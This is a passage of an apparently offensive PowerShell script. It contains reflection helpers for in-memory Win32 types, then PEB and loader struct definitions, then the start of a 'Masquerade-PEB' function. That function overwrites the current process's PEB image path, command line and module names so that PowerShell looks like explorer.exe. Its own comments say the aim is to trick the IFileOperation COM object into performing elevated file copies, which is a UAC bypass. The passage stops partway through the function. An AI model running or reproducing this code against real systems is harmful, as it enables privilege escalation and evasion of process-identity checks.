3-Clause\r\n    Required Dependencies: None\r\n    Optional Dependencies: func\r\n    \r\n    .DESCRIPTION\r\n    \r\n    Add-Win32Type enables you to easily interact with unmanaged (i.e.\r\n    Win32 unmanaged) functions in PowerShell. After providing\r\n    Add-Win32Type with a function signature, a .NET type is created\r\n    using reflection (i.e. csc.exe is never called like with Add-Type).\r\n    \r\n    The 'func' helper function can be used to reduce typing when defining\r\n    multiple function definitions.\r\n    \r\n    .PARAMETER DllName\r\n    \r\n    The name of the DLL.\r\n    \r\n    .PARAMETER FunctionName\r\n    \r\n    The name of the target function.\r\n    \r\n    .PARAMETER EntryPoint\r\n    \r\n    The DLL export function name. This argument should be specified if the\r\n    specified function name is different than the name of the exported\r\n    function.\r\n    \r\n    .PARAMETER ReturnType\r\n    \r\n    The return type of the function.\r\n    \r\n    .PARAMETER ParameterTypes\r\n    \r\n    The function parameters.\r\n    \r\n    .PARAMETER NativeCallingConvention\r\n    \r\n    Specifies the native calling convention of the function. Defaults to\r\n    stdcall.\r\n    \r\n    .PARAMETER Charset\r\n    \r\n    If you need to explicitly call an 'A' or 'W' Win32 function, you can\r\n    specify the character set.\r\n    \r\n    .PARAMETER SetLastError\r\n    \r\n    Indicates whether the callee calls the SetLastError Win32 API\r\n    function before returning from the attributed method.\r\n    \r\n    .PARAMETER Module\r\n    \r\n    The in-memory module that will host the functions. Use\r\n    New-InMemoryModule to define an in-memory module.\r\n    \r\n    .PARAMETER Namespace\r\n    \r\n    An optional namespace to prepend to the type. Add-Win32Type defaults\r\n    to a namespace consisting only of the name of the DLL.\r\n    \r\n    .EXAMPLE\r\n    \r\n    $Mod = New-InMemoryModule -ModuleName Win32\r\n    \r\n    $FunctionDefinitions = @(\r\n      (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError),\r\n      (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError),\r\n      (func ntdll RtlGetCurrentPeb ([IntPtr]) @())\r\n    )\r\n    \r\n    $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'\r\n    $Kernel32 = $Types['kernel32']\r\n    $Ntdll = $Types['ntdll']\r\n    $Ntdll::RtlGetCurrentPeb()\r\n    $ntdllbase = $Kernel32::GetModuleHandle('ntdll')\r\n    $Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb')\r\n    \r\n    .NOTES\r\n    \r\n    Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189\r\n    \r\n    When defining multiple function prototypes, it is ideal to provide\r\n    Add-Win32Type with an array of function signatures. That way, they\r\n    are all incorporated into the same in-memory module.\r\n    #>\r\n    \r\n        [OutputType([Hashtable])]\r\n        Param(\r\n            [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]\r\n            [String]\r\n            $DllName,\r\n        \r\n            [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]\r\n            [String]\r\n            $FunctionName,\r\n        \r\n            [Parameter(ValueFromPipelineByPropertyName = $True)]\r\n            [String]\r\n            $EntryPoint,\r\n        \r\n            [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]\r\n            [Type]\r\n            $ReturnType,\r\n        \r\n            [Parameter(ValueFromPipelineByPropertyName = $True)]\r\n            [Type[]]\r\n            $ParameterTypes,\r\n        \r\n            [Parameter(ValueFromPipelineByPropertyName = $True)]\r\n            [Runtime.InteropServices.CallingConvention]\r\n            $NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall,\r\n        \r\n            [Parameter(ValueFromPipelineByPropertyName = $True)]\r\n            [Runtime.InteropServices.CharSet]\r\n            $Charset = [Runtime.InteropServices.CharSet]::Auto,\r\n        \r\n            [Parameter(ValueFromPipelineByPropertyName = $True)]\r\n            [Switch]\r\n            $SetLastError,\r\n        \r\n            [Parameter(Mandatory = $True)]\r\n            [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]\r\n            $Module,\r\n        \r\n            [ValidateNotNull()]\r\n            [String]\r\n            $Namespace = ''\r\n        )\r\n    \r\n        BEGIN\r\n        {\r\n            $TypeHash = @{}\r\n        }\r\n    \r\n        PROCESS\r\n        {\r\n            if ($Module -is [Reflection.Assembly])\r\n            {\r\n                if ($Namespace)\r\n                {\r\n                    $TypeHash[$DllName] = $Module.GetType(\"$Namespace.$DllName\")\r\n                }\r\n                else\r\n                {\r\n                    $TypeHash[$DllName] = $Module.GetType($DllName)\r\n                }\r\n            }\r\n            else\r\n            {\r\n                # Define one type for each DLL\r\n                if (!$TypeHash.ContainsKey($DllName))\r\n                {\r\n                    if ($Namespace)\r\n                    {\r\n                        $TypeHash[$DllName] = $Module.DefineType(\"$Namespace.$DllName\", 'Public,BeforeFieldInit')\r\n                    }\r\n                    else\r\n                    {\r\n                        $TypeHash[$DllName] = $Module.DefineType($DllName, 'Public,BeforeFieldInit')\r\n                    }\r\n                }\r\n            \r\n                $Method = $TypeHash[$DllName].DefineMethod(\r\n                    $FunctionName,\r\n                    'Public,Static,PinvokeImpl',\r\n                    $ReturnType,\r\n                    $ParameterTypes)\r\n                \r\n                # Make each ByRef parameter an Out parameter\r\n                $i = 1\r\n                foreach($Parameter in $ParameterTypes)\r\n                {\r\n                    if ($Parameter.IsByRef)\r\n                    {\r\n                        [void] $Method.DefineParameter($i, 'Out', $null)\r\n                    }\r\n                \r\n                    $i++\r\n                }\r\n            \r\n                $DllImport = [Runtime.InteropServices.DllImportAttribute]\r\n                $SetLastErrorField = $DllImport.GetField('SetLastError')\r\n                $CallingConventionField = $DllImport.GetField('CallingConvention')\r\n                $CharsetField = $DllImport.GetField('CharSet')\r\n                $EntryPointField = $DllImport.GetField('EntryPoint')\r\n                if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False }\r\n            \r\n                if ($PSBoundParameters['EntryPoint']) { $ExportedFuncName = $EntryPoint } else { $ExportedFuncName = $FunctionName }\r\n            \r\n                # Equivalent to C# version of [DllImport(DllName)]\r\n                $Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String])\r\n                $DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor,\r\n                    $DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(),\r\n                    [Reflection.FieldInfo[]] @($SetLastErrorField,\r\n                                               $CallingConventionField,\r\n                                               $CharsetField,\r\n                                               $EntryPointField),\r\n                    [Object[]] @($SLEValue,\r\n                                 ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention),\r\n                                 ([Runtime.InteropServices.CharSet] $Charset),\r\n                                 $ExportedFuncName))\r\n                             \r\n                $Method.SetCustomAttribute($DllImportAttribute)\r\n            }\r\n        }\r\n    \r\n        END\r\n        {\r\n            if ($Module -is [Reflection.Assembly])\r\n            {\r\n                return $TypeHash\r\n            }\r\n        \r\n            $ReturnTypes = @{}\r\n        \r\n            foreach ($Key in $TypeHash.Keys)\r\n            {\r\n                $Type = $TypeHash[$Key].CreateType()\r\n                \r\n                $ReturnTypes[$Key] = $Type\r\n            }\r\n        \r\n            return $ReturnTypes\r\n        }\r\n    }\r\n    \r\n    \r\n    function psenum\r\n    {\r\n    <#\r\n    .SYNOPSIS\r\n    \r\n    Creates an in-memory enumeration for use in your PowerShell session.\r\n    \r\n    Author: Matthew Graeber (@mattifestation)\r\n    License: BSD 3-Clause\r\n    Required Dependencies: None\r\n    Optional Dependencies: None\r\n    \r\n    .DESCRIPTION\r\n    \r\n    The 'psenum' function facilitates the creation of enums entirely in\r\n    memory using as close to a \"C style\" as PowerShell will allow.\r\n    \r\n    .PARAMETER Module\r\n    \r\n    The in-memory module that will host the enum. Use\r\n    New-InMemoryModule to define an in-memory module.\r\n    \r\n    .PARAMETER FullName\r\n    \r\n    The fully-qualified name of the enum.\r\n    \r\n    .PARAMETER Type\r\n    \r\n    The type of each enum element.\r\n    \r\n    .PARAMETER EnumElements\r\n    \r\n    A hashtable of enum elements.\r\n    \r\n    .PARAMETER Bitfield\r\n    \r\n    Specifies that the enum should be treated as a bitfield.\r\n    \r\n    .EXAMPLE\r\n    \r\n    $Mod = New-InMemoryModule -ModuleName Win32\r\n    \r\n    $ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{\r\n        UNKNOWN =                  0\r\n        NATIVE =                   1 # Image doesn't require a subsystem.\r\n        WINDOWS_GUI =              2 # Image runs in the Windows GUI subsystem.\r\n        WINDOWS_CUI =              3 # Image runs in the Windows character subsystem.\r\n        OS2_CUI =                  5 # Image runs in the OS/2 character subsystem.\r\n        POSIX_CUI =                7 # Image runs in the Posix character subsystem.\r\n        NATIVE_WINDOWS =           8 # Image is a native Win9x driver.\r\n        WINDOWS_CE_GUI =           9 # Image runs in the Windows CE subsystem.\r\n        EFI_APPLICATION =          10\r\n        EFI_BOOT_SERVICE_DRIVER =  11\r\n        EFI_RUNTIME_DRIVER =       12\r\n        EFI_ROM =                  13\r\n        XBOX =                     14\r\n        WINDOWS_BOOT_APPLICATION = 16\r\n    }\r\n    \r\n    .NOTES\r\n    \r\n    PowerShell purists may disagree with the naming of this function but\r\n    again, this was developed in such a way so as to emulate a \"C style\"\r\n    definition as closely as possible. Sorry, I'm not going to name it\r\n    New-Enum. :P\r\n    #>\r\n    \r\n        [OutputType([Type])]\r\n        Param\r\n        (\r\n            [Parameter(Position = 0, Mandatory = $True)]\r\n            [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]\r\n            $Module,\r\n        \r\n            [Parameter(Position = 1, Mandatory = $True)]\r\n            [ValidateNotNullOrEmpty()]\r\n            [String]\r\n            $FullName,\r\n        \r\n            [Parameter(Position = 2, Mandatory = $True)]\r\n            [Type]\r\n            $Type,\r\n        \r\n            [Parameter(Position = 3, Mandatory = $True)]\r\n            [ValidateNotNullOrEmpty()]\r\n            [Hashtable]\r\n            $EnumElements,\r\n        \r\n            [Switch]\r\n            $Bitfield\r\n        )\r\n    \r\n        if ($Module -is [Reflection.Assembly])\r\n        {\r\n            return ($Module.GetType($FullName))\r\n        }\r\n    \r\n        $EnumType = $Type -as [Type]\r\n    \r\n        $EnumBuilder = $Module.DefineEnum($FullName, 'Public', $EnumType)\r\n    \r\n        if ($Bitfield)\r\n        {\r\n            $FlagsConstructor = [FlagsAttribute].GetConstructor(@())\r\n            $FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @())\r\n            $EnumBuilder.SetCustomAttribute($FlagsCustomAttribute)\r\n        }\r\n    \r\n        foreach ($Key in $EnumElements.Keys)\r\n        {\r\n            # Apply the specified enum type to each element\r\n            $null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType)\r\n        }\r\n    \r\n        $EnumBuilder.CreateType()\r\n    }\r\n    \r\n    \r\n    # A helper function used to reduce typing while defining struct\r\n    # fields.\r\n    function field\r\n    {\r\n        Param\r\n        (\r\n            [Parameter(Position = 0, Mandatory = $True)]\r\n            [UInt16]\r\n            $Position,\r\n            \r\n            [Parameter(Position = 1, Mandatory = $True)]\r\n            [Type]\r\n            $Type,\r\n            \r\n            [Parameter(Position = 2)]\r\n            [UInt16]\r\n            $Offset,\r\n            \r\n            [Object[]]\r\n            $MarshalAs\r\n        )\r\n    \r\n        @{\r\n            Position = $Position\r\n            Type = $Type -as [Type]\r\n            Offset = $Offset\r\n            MarshalAs = $MarshalAs\r\n        }\r\n    }\r\n    \r\n    \r\n    function struct\r\n    {\r\n    <#\r\n    .SYNOPSIS\r\n    \r\n    Creates an in-memory struct for use in your PowerShell session.\r\n    \r\n    Author: Matthew Graeber (@mattifestation)\r\n    License: BSD 3-Clause\r\n    Required Dependencies: None\r\n    Optional Dependencies: field\r\n    \r\n    .DESCRIPTION\r\n    \r\n    The 'struct' function facilitates the creation of structs entirely in\r\n    memory using as close to a \"C style\" as PowerShell will allow. Struct\r\n    fields are specified using a hashtable where each field of the struct\r\n    is comprosed of the order in which it should be defined, its .NET\r\n    type, and optionally, its offset and special marshaling attributes.\r\n    \r\n    One of the features of 'struct' is that after your struct is defined,\r\n    it will come with a built-in GetSize method as well as an explicit\r\n    converter so that you can easily cast an IntPtr to the struct without\r\n    relying upon calling SizeOf and/or PtrToStructure in the Marshal\r\n    class.\r\n    \r\n    .PARAMETER Module\r\n    \r\n    The in-memory module that will host the struct. Use\r\n    New-InMemoryModule to define an in-memory module.\r\n    \r\n    .PARAMETER FullName\r\n    \r\n    The fully-qualified name of the struct.\r\n    \r\n    .PARAMETER StructFields\r\n    \r\n    A hashtable of fields. Use the 'field' helper function to ease\r\n    defining each field.\r\n    \r\n    .PARAMETER PackingSize\r\n    \r\n    Specifies the memory alignment of fields.\r\n    \r\n    .PARAMETER ExplicitLayout\r\n    \r\n    Indicates that an explicit offset for each field will be specified.\r\n    \r\n    .EXAMPLE\r\n    \r\n    $Mod = New-InMemoryModule -ModuleName Win32\r\n    \r\n    $ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{\r\n        DOS_SIGNATURE =    0x5A4D\r\n        OS2_SIGNATURE =    0x454E\r\n        OS2_SIGNATURE_LE = 0x454C\r\n        VXD_SIGNATURE =    0x454C\r\n    }\r\n    \r\n    $ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{\r\n        e_magic =    field 0 $ImageDosSignature\r\n        e_cblp =     field 1 UInt16\r\n        e_cp =       field 2 UInt16\r\n        e_crlc =     field 3 UInt16\r\n        e_cparhdr =  field 4 UInt16\r\n        e_minalloc = field 5 UInt16\r\n        e_maxalloc = field 6 UInt16\r\n        e_ss =       field 7 UInt16\r\n        e_sp =       field 8 UInt16\r\n        e_csum =     field 9 UInt16\r\n        e_ip =       field 10 UInt16\r\n        e_cs =       field 11 UInt16\r\n        e_lfarlc =   field 12 UInt16\r\n        e_ovno =     field 13 UInt16\r\n        e_res =      field 14 UInt16[] -MarshalAs @('ByValArray', 4)\r\n        e_oemid =    field 15 UInt16\r\n        e_oeminfo =  field 16 UInt16\r\n        e_res2 =     field 17 UInt16[] -MarshalAs @('ByValArray', 10)\r\n        e_lfanew =   field 18 Int32\r\n    }\r\n    \r\n    # Example of using an explicit layout in order to create a union.\r\n    $TestUnion = struct $Mod TestUnion @{\r\n        field1 = field 0 UInt32 0\r\n        field2 = field 1 IntPtr 0\r\n    } -ExplicitLayout\r\n    \r\n    .NOTES\r\n    \r\n    PowerShell purists may disagree with the naming of this function but\r\n    again, this was developed in such a way so as to emulate a \"C style\"\r\n    definition as closely as possible. Sorry, I'm not going to name it\r\n    New-Struct. :P\r\n    #>\r\n    \r\n        [OutputType([Type])]\r\n        Param\r\n        (\r\n            [Parameter(Position = 1, Mandatory = $True)]\r\n            [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]\r\n            $Module,\r\n        \r\n            [Parameter(Position = 2, Mandatory = $True)]\r\n            [ValidateNotNullOrEmpty()]\r\n            [String]\r\n            $FullName,\r\n        \r\n            [Parameter(Position = 3, Mandatory = $True)]\r\n            [ValidateNotNullOrEmpty()]\r\n            [Hashtable]\r\n            $StructFields,\r\n        \r\n            [Reflection.Emit.PackingSize]\r\n            $PackingSize = [Reflection.Emit.PackingSize]::Unspecified,\r\n        \r\n            [Switch]\r\n            $ExplicitLayout\r\n        )\r\n    \r\n        if ($Module -is [Reflection.Assembly])\r\n        {\r\n            return ($Module.GetType($FullName))\r\n        }\r\n    \r\n        [Reflection.TypeAttributes] $StructAttributes = 'AnsiClass,\r\n            Class,\r\n            Public,\r\n            Sealed,\r\n            BeforeFieldInit'\r\n        \r\n        if ($ExplicitLayout)\r\n        {\r\n            $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::ExplicitLayout\r\n        }\r\n        else\r\n        {\r\n            $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::SequentialLayout\r\n        }\r\n    \r\n        $StructBuilder = $Module.DefineType($FullName, $StructAttributes, [ValueType], $PackingSize)\r\n        $ConstructorInfo = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]\r\n        $SizeConst = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))\r\n    \r\n        $Fields = New-Object Hashtable[]($StructFields.Count)\r\n    \r\n        # Sort each field according to the orders specified\r\n        # Unfortunately, PSv2 doesn't have the luxury of the\r\n        # hashtable [Ordered] accelerator.\r\n        foreach ($Field in $StructFields.Keys)\r\n        {\r\n            $Index = $StructFields[$Field]['Position']\r\n            $Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]}\r\n        }\r\n    \r\n        foreach ($Field in $Fields)\r\n        {\r\n            $FieldName = $Field['FieldName']\r\n            $FieldProp = $Field['Properties']\r\n        \r\n            $Offset = $FieldProp['Offset']\r\n            $Type = $FieldProp['Type']\r\n            $MarshalAs = $FieldProp['MarshalAs']\r\n        \r\n            $NewField = $StructBuilder.DefineField($FieldName, $Type, 'Public')\r\n        \r\n            if ($MarshalAs)\r\n            {\r\n                $UnmanagedType = $MarshalAs[0] -as ([Runtime.InteropServices.UnmanagedType])\r\n                if ($MarshalAs[1])\r\n                {\r\n                    $Size = $MarshalAs[1]\r\n                    $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo,\r\n                        $UnmanagedType, $SizeConst, @($Size))\r\n                }\r\n                else\r\n                {\r\n                    $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, [Object[]] @($UnmanagedType))\r\n                }\r\n                \r\n                $NewField.SetCustomAttribute($AttribBuilder)\r\n            }\r\n        \r\n            if ($ExplicitLayout) { $NewField.SetOffset($Offset) }\r\n        }\r\n    \r\n        # Make the struct aware of its own size.\r\n        # No more having to call [Runtime.InteropServices.Marshal]::SizeOf!\r\n        $SizeMethod = $StructBuilder.DefineMethod('GetSize',\r\n            'Public, Static',\r\n            [Int],\r\n            [Type[]] @())\r\n        $ILGenerator = $SizeMethod.GetILGenerator()\r\n        # Thanks for the help, Jason Shirk!\r\n        $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)\r\n        $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call,\r\n            [Type].GetMethod('GetTypeFromHandle'))\r\n        $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call,\r\n            [Runtime.InteropServices.Marshal].GetMethod('SizeOf', [Type[]] @([Type])))\r\n        $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ret)\r\n    \r\n        # Allow for explicit casting from an IntPtr\r\n        # No more having to call [Runtime.InteropServices.Marshal]::PtrToStructure!\r\n        $ImplicitConverter = $StructBuilder.DefineMethod('op_Implicit',\r\n            'PrivateScope, Public, Static, HideBySig, SpecialName',\r\n            $StructBuilder,\r\n            [Type[]] @([IntPtr]))\r\n        $ILGenerator2 = $ImplicitConverter.GetILGenerator()\r\n        $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Nop)\r\n        $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldarg_0)\r\n        $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)\r\n        $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call,\r\n            [Type].GetMethod('GetTypeFromHandle'))\r\n        $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call,\r\n            [Runtime.InteropServices.Marshal].GetMethod('PtrToStructure', [Type[]] @([IntPtr], [Type])))\r\n        $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder)\r\n        $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ret)\r\n    \r\n        $StructBuilder.CreateType()\r\n    }\r\n    \r\n    #---------------\r\n    # Win32 Definitions\r\n    #---------------\r\n    \r\n    $Module = New-InMemoryModule -ModuleName UACalamity\r\n    \r\n    $UNICODE_STRING = struct $Module UNICODE_STRING @{\r\n    \tLength        = field 0 UInt16\r\n    \tMaximumLength = field 1 UInt16\r\n    \tBuffer        = field 2 IntPtr\r\n    }\r\n    \r\n    $LIST_ENTRY = struct $Module _LIST_ENTRY @{\r\n    \tFlink = field 0 IntPtr\r\n    \tBlink = field 1 IntPtr\r\n    }\r\n    \r\n    $PROCESS_BASIC_INFORMATION = struct $Module _PROCESS_BASIC_INFORMATION @{\r\n    \tExitStatus                   = field 0 IntPtr\r\n    \tPebBaseAddress               = field 1 IntPtr\r\n    \tAffinityMask                 = field 2 IntPtr\r\n    \tBasePriority                 = field 3 IntPtr\r\n    \tUniqueProcessId              = field 4 UIntPtr\r\n    \tInheritedFromUniqueProcessId = field 5 IntPtr\r\n    }\r\n    \r\n    # Partial PEB\r\n    $PEB = struct $Module _PEB @{\r\n    \tLdr32               = field 0 IntPtr -Offset 12\r\n    \tProcessParameters32 = field 1 IntPtr -Offset 16\r\n    \tLdr64               = field 2 IntPtr -Offset 24\r\n    \tFastPebLock32       = field 3 IntPtr -Offset 28\r\n    \tProcessParameters64 = field 4 IntPtr -Offset 32\r\n    \tFastPebLock64       = field 5 IntPtr -Offset 56\r\n    } -ExplicitLayout\r\n    \r\n    # Partial _PEB_LDR_DATA\r\n    $PEB_LDR_DATA = struct $Module _PEB_LDR_DATA @{\r\n    \tLength                          = field 0 UInt32\r\n    \tInitialized                     = field 1 Byte\r\n    \tSsHandle                        = field 2 IntPtr\r\n    \tInLoadOrderModuleList           = field 3 $LIST_ENTRY\r\n    \tInMemoryOrderModuleList         = field 4 $LIST_ENTRY\r\n    \tInInitializationOrderModuleList = field 5 $LIST_ENTRY\r\n    \tEntryInProgress                 = field 6 IntPtr\r\n    }\r\n    \r\n    # Partial _LDR_DATA_TABLE_ENTRY\r\n    $LDR_DATA_TABLE_ENTRY = struct $Module _LDR_DATA_TABLE_ENTRY @{\r\n    \tInLoadOrderLinks           = field 0 $LIST_ENTRY\r\n    \tInMemoryOrderLinks         = field 1 $LIST_ENTRY\r\n    \tInInitializationOrderLinks = field 2 $LIST_ENTRY\r\n    \tDllBase                    = field 3 IntPtr\r\n    \tEntryPoint                 = field 4 IntPtr\r\n    \tSizeOfImage                = field 5 UInt32\r\n    \tFullDllName                = field 6 $UNICODE_STRING\r\n    \tBaseDllName                = field 7 $UNICODE_STRING\r\n    }\r\n    \r\n    $FunctionDefinitions = @(\r\n    \r\n    \t(func kernel32 VirtualProtectEx ([Byte]) @(\r\n    \t\t[IntPtr],                # hProcess\r\n    \t\t[IntPtr],                # lpAddress\r\n    \t\t[UInt32],                # dwSize\r\n    \t\t[UInt32],                # flNewProtect\r\n    \t\t[UInt32].MakeByRefType() # lpflOldProtect\r\n    \t)),\r\n    \r\n    \t(func kernel32 WriteProcessMemory ([Byte]) @(\r\n    \t\t[IntPtr],                # hProcess\r\n    \t\t[IntPtr],                # lpBaseAddress\r\n    \t\t[IntPtr],                # lpBuffer\r\n    \t\t[UInt32],                # nSize\r\n    \t\t[UInt32].MakeByRefType() # lpNumberOfBytesWritten\r\n    \t)),\r\n    \r\n    \t(func ntdll NtQueryInformationProcess ([Int]) @(\r\n    \t\t[IntPtr],                                    # hProcess\r\n    \t\t[Int],                                       # lpBaseAddress\r\n    \t\t$PROCESS_BASIC_INFORMATION.MakeByRefType(),  # lpBuffer\r\n    \t\t[Int],                                       # nSize\r\n    \t\t[Int].MakeByRefType()                        # lpNumberOfBytesWritten\r\n    \t)),\r\n    \r\n    \t(func ntdll RtlEnterCriticalSection ([Void]) @(\r\n    \t\t[IntPtr] # lpCriticalSection\r\n    \t)),\r\n    \r\n    \t(func ntdll RtlLeaveCriticalSection ([Void]) @(\r\n    \t\t[IntPtr] # lpCriticalSection\r\n    \t))\r\n    \r\n    )\r\n    \r\n    $Types = $FunctionDefinitions | Add-Win32Type -Module $Module -Namespace 'Win32'\r\n    $Kernel32 = $Types['kernel32']\r\n    $NtDll = $Types['ntdll']\r\n    \r\n    #---------------\r\n    # Masquerade-PEB\r\n    #---------------\r\n    \r\n    function Masquerade-PEB {\r\n    <#\r\n    .SYNOPSIS\r\n        Masquerade-PEB uses NtQueryInformationProcess to get a handle to powershell's\r\n        PEB. From there it replaces a number of UNICODE_STRING structs in memory to\r\n        give powershell the appearance of a different process. Specifically, the\r\n        function will overwrite powershell's \"ImagePathName\" & \"CommandLine\" in\r\n        _RTL_USER_PROCESS_PARAMETERS and the \"FullDllName\" & \"BaseDllName\" in the\r\n        _LDR_DATA_TABLE_ENTRY linked list.\r\n        \r\n        This can be useful as it would fool any Windows work-flows which rely solely\r\n        on the Process Status API to check process identity. A practical example would\r\n        be the IFileOperation COM Object which can perform an elevated file copy if it\r\n        thinks powershell is really explorer.exe ;)!\r\n    \r\n        Notes:\r\n          * Works on x32/64.\r\n      \r\n          * Most of these API's and structs are undocumented. I strongly recommend\r\n            @rwfpl's terminus project as a reference guide!\r\n              + http://terminus.rewolf.pl/terminus/\r\n          \r\n          * Masquerade-PEB is basically a reimplementation of two functions in UACME\r\n            by @hFireF0X. My code is quite different because, unfortunately, I don't\r\n            have access to all those c++ goodies and I could not get a callback for\r\n            LdrEnumerateLoadedModules working!\r\n              + supMasqueradeProcess: https://github.com/hfiref0x/UACME/blob/master/Source/Akagi/sup.c#L504\r\n              + supxLdrEnumModulesCallback: https://github.com/hfiref0x/UACME/blob/master/Source/Akagi/sup.c#L477\r\n          \r\n    .DESCRIPTION\r\n        Author: Ruben Boonen (@FuzzySec)\r\n        License: BSD 3-Clause\r\n        Required Dependencies: None\r\n        Optional Dependencies: None\r\n    \r\n    .EXAMPLE\r\n        C:\\PS> Masquerade-PEB -BinPath \"C:\\Windows\\explorer.exe\"\r\n    #>\r\n    \r\n    \tparam (\r\n    \t\t[Parameter(Mandatory = $True)]\r\n    \t\t[string]$BinPath\r\n    \t)\r\n    \r\n    \tif ([System.IntPtr]::Size -eq 4) {\r\n    \t\t$x32Architecture = 1\r\n    \t}\r\n    \r\n    \t# Current Proc handle\r\n    \t$ProcHandle = (Get-Process -Id ([System.Diagnostics.Process]::GetCurrentProcess().Id)).Handle\r\n    \r\n    \t# Helper function to overwrite UNICODE_STRING structs in memory\r\n    \tfunction Emit-UNICODE_STRING {\r\n    \t\tparam(\r\n    \t\t\t[IntPtr]$hProcess,\r\n    \t\t\t[IntPtr]$lpBaseAddress,\r\n    \t\t\t[UInt32]$dwSize,\r\n    \t\t\t[String]$data\r\n    \t\t)\r\n        \r\n    \t\t# Set access protections -> PAGE_EXECUTE_READWRITE\r\n    \t\t[UInt32]$lpflOldProtect = 0\r\n    \t\t$CallResult = $Kernel32::VirtualProtectEx($hProcess, $lpBaseAddress, $dwSize, 0x40, [ref]$lpflOldProtect)\r\n        \r\n    \t\t# Create replacement struct\r\n    \t\t$UnicodeObject = [Activator]::CreateInstance($UNICODE_STRING)\r\n    \t\t$UnicodeObject_Buffer = $data\r\n    \t\t[UInt16]$UnicodeObject.Length = $UnicodeObject_Buffer.Length*2\r\n    \t\t[UInt16]$UnicodeObject.MaximumLength = $UnicodeObject.Length+1\r\n    \t\t[IntPtr]$UnicodeObject.Buffer = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($UnicodeObject_Buffer)\r\n    \t\t[IntPtr]$InMemoryStruct = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($dwSize)\r\n    \t\t[system.runtime.interopservices.marshal]::StructureToPtr($UnicodeObject, $InMemoryStruct, $true)\r\n        \r\n    \t\t# Overwrite PEB UNICODE_STRING struct\r\n    \t\t[UInt32]$lpNumberOfBytesWritten = 0\r\n    \t\t$CallResult = $Kernel32::WriteProcessMemory($hProcess, $lpBaseAddress, $InMemoryStruct, $dwSize, [ref]$lpNumberOfBytesWritten)\r\n        \r\n    \t\t# Free $InMemoryStruct\r\n    \t\t[System.Runtime.InteropServices.Marshal]::FreeHGlobal($InMemoryStruct)\r\n    \t}\r\n    \r\n    \t# Process Basic Information\r\n    \t$_PROCESS_BASIC_INFORMATION = [Activator]::CreateInstance($PROCESS_BASIC_INFORMATION)\r\n    \t$ReturnLength = New-Object Int\r\n    \t$CallResult = $NtDll::NtQueryInformationProcess($ProcHandle, 0, [ref]$_PROCESS_BASIC_INFORMATION, $PROCESS_BASIC_INFORMATION::GetSize(), [ref]$ReturnLength)\r\n    \r\n    \t# PID & PEB address\r\n    \t#echo \"[?] PID $($_PROCESS_BASIC_INFORMATION.UniqueProcessId)\"\r\n    \tif ($x32Architecture) {\r\n    \t\techo \"[+] PebBaseAddress: 0x$(\"{0:X8}\" -f $_PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt32())\"\r\n    \t} else {\r\n    \t\techo \"[+] PebBaseAddress: 0x$(\"{0:X16}\" -f $_PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64())\"\r\n    \t}\r\n        \r\n    \t# Lazy PEB parsing\r\n    \t$_PEB = [Activator]::CreateInstance($PEB)\r\n    \t$_PEB = $_PEB.GetType()\r\n    \t$BufferOffset = $_PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64()\r\n    \t$NewIntPtr = New-Object System.Intptr -ArgumentList $BufferOffset\r\n    \t$PEBFlags = [system.runtime.interopservices.marshal]::PtrToStructure($NewIntPtr, [type]$_PEB)\r\n    \r\n    \t# Take ownership of PEB\r\n    \t# Not sure this is strictly necessary but why not!\r\n    \tif ($x32Architecture) {\r\n    \t\t$NtDll::RtlEnterCriticalSection($PEBFlags.FastPebLock32)\r\n    \t} else {\r\n    \t\t$NtDll::RtlEnterCriticalSection($PEBFlags.FastPebLock64)\r\n    \t} echo \"[!] RtlEnterCriticalSection --> &Peb->FastPebLock\"\r\n    \r\n    \t# &Peb->ProcessParameters->ImagePathName/CommandLine\r\n    \tif 